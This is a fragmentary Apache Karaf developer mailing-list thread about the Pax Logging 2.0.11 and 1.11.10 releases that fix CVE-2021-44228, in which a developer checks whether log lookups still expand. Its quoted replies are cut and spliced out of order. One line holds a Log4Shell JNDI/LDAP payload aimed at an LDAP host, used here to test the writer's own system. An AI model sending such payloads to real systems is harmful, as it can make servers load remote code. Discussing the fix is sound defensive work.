then:
> > >>>>
> > >>>> karaf@root()> log:log '${jndi:ldap://10.39.192.99/cn=boom,dc=k8s,dc=forest}'
> > >>>>
> > >>>> gave me this in logs:
> > >>>>
> > >
> It still expands ${java:version}. I checked that it shows with
> >>>> “system:property log4j.formatMsgNoLookup” true and there seems to be no
> >>>> %m{lookup} setting.
> >>>>
> >>>> I am using pax logging 2.0.8 which
4j?
--
https://bernd.eckenfels.net
From: Grzegorz Grzybek
Sent: Friday, December 10, 2021 1:43:00 PM
To: dev@karaf.apache.org
Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10
released
Hello
Actually, https://issues.apache.org/jira/browse/LOG4J2-
ontaining log4j 2.14.1 (I.e a
> > > version newer than 2.10).
> > >
> > > Any idea?
> > >
> > > Is it possible that the shaded pax-logging-log4j does not honor the system
> > > property of log4j?
> > >
> > >
> > > --
> > > https://bern
rzegorz Grzybek
> >
> > Fri, 10 Dec 2021 at 13:28 Bernd Eckenfels wrote:
> >
> > > Hello Grzegorz,
> > >
> > > Thanks a lot for the super quick reaction.
> > >
> > > I was rather confused to see that log messages can trigger a JNDI lookup
es not honor the system
> property of log4j?
>
>
> --
> https://bernd.eckenfels.net
>
> From: Grzegorz Grzybek
> Sent: Friday, December 10, 2021 1:43:00 PM
> To: dev@karaf.apache.org
> Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 an
> Grzegorz Grzybek :
> Hello
> Pax Logging 2.0.11 and 1.11.10 have been released with CVE-2021-44228 fix.
> *Log4j2 has been updated to version 2.15.0.*
Great! Thanks!
___
> From: Bernd Eckenfels
> Sent: Friday, December 10, 2021 11:26:19 PM
> To: dev@karaf.apache.org
> Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
>
> I am currently working on a description for a work around (specifying the
> syste
why but that means at least the POC
vectors don’t harm me.
--
https://bernd.eckenfels.net
From: Bernd Eckenfels
Sent: Friday, December 10, 2021 11:26:19 PM
To: dev@karaf.apache.org
Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
I am
, 2021 1:43:00 PM
To: dev@karaf.apache.org
Subject: Re: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
Hello
Actually, https://issues.apache.org/jira/browse/LOG4J2-3198 describes it in
detail.
I was a bit surprised too - I knew about e.g., `${java:version}` if you
used
.net
>
> From: Grzegorz Grzybek
> Sent: Friday, December 10, 2021 12:20:02 PM
> To: ops4j-announcem...@googlegroups.com <
> ops4j-announcem...@googlegroups.com>; Karaf Dev ;
> d...@felix.apache.org
> Subject: [ANN][CVE-2021-44228
: [ANN][CVE-2021-44228] Pax Logging 2.0.11 and 1.11.10 released
Hello
Pax Logging 2.0.11 and 1.11.10 have been released with CVE-2021-44228 fix.
*Log4j2 has been updated to version 2.15.0.*
The changelog is available at GitHub:
https://github.com/ops4j/org.ops4j.pax.logging/milestone/72?closed=1
kind regards
Grzegorz Grzybek